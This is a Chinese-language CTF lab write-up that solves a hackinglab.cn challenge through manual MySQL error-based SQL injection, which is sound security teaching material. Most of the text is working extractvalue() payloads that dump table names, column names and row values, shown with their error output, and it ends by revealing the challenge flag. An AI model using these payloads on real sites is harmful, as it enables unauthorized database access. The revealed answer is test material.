hackinglab.cn注入关之六

题目:

本题目为手工注入学习题目,主要用于练习基于Mysql报错的手工注入。Sqlmap一定能跑出来,所以不必测试了。flag中不带key和#


writeup:

题目上都说了是基于mysql报错的手工注入。

  1. 进入题目后返回如下界面;
    username:admin
    status:ok 

    直接加单引号返回:
    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
    
    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'' limit 1' at line 1
    username:admin'
    status:ok
    

  2. 可以直接看到这一句
     ''admin'' limit 1'

    可以推出后台的大概sql语句为(table是代指):
    "select * from table where username=\'$_GET['username']\' limit 1"
  3. 基于报错的注入有很多方式(可以看看这个博客整理的http://www.2cto.com/database/201410/344310.html),这里写一种利用extractvalue函数进行的注入:
    ?username=admin' and extractvalue(rand(),concat(0x3a,(SQL注入语句)))%23
  4. 爆出表名:
    ?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))%23

    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
    
    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
    XPATH syntax error: ':log,motto,user'
    username:admin' and extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))#
    status:ok
    

    发现有log,user,motto三个表。
  5. 爆出列名(以motto为例)
    ?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name='motto')))%23

    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
    
    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
    XPATH syntax error: ':id,username,motto'
    username:admin' and extractvalue(rand(),concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name='motto')))#
    status:ok
    

    发现列名id,username,motto。
  6. 查询各列值
     
    ?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(motto) from motto)))%23

    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
    
    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
    XPATH syntax error: ':mymotto,happy everyday,nothing '
    username:admin' and extractvalue(rand(),concat(0x3a,(select group_concat(motto) from motto)))#
    status:ok
    

    ?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(username) from motto)))%23

    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
    
    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
    XPATH syntax error: ':admin,guest,test,#adf#ad@@#'
    username:admin' and extractvalue(rand(),concat(0x3a,(select group_concat(username) from motto)))#
    status:ok
    

    可以发现两次注入返回的结果username字段比motto字段多一个结果,这说明flag可能就在被隐藏的结果中(这点应该有办法事先知道,我是对比出来的,初学注入技术还不到位)。
  7. 再次构造如下语句,利用limit查询:
    ?username=admin' and extractvalue(rand(),concat(0x3a,(select concat(motto,0x3a) from motto limit 3,1)))%23

    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
    
    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
    XPATH syntax error: ':key#notfound!#:'
    username:admin' and extractvalue(rand(),concat(0x3a,(select concat(motto,0x3a) from motto limit 3,1)))#
    status:ok
    

    再根据题目提示,去掉key和号得到flag!!

 

你可能感兴趣的:(hackinglab.cn注入关之六)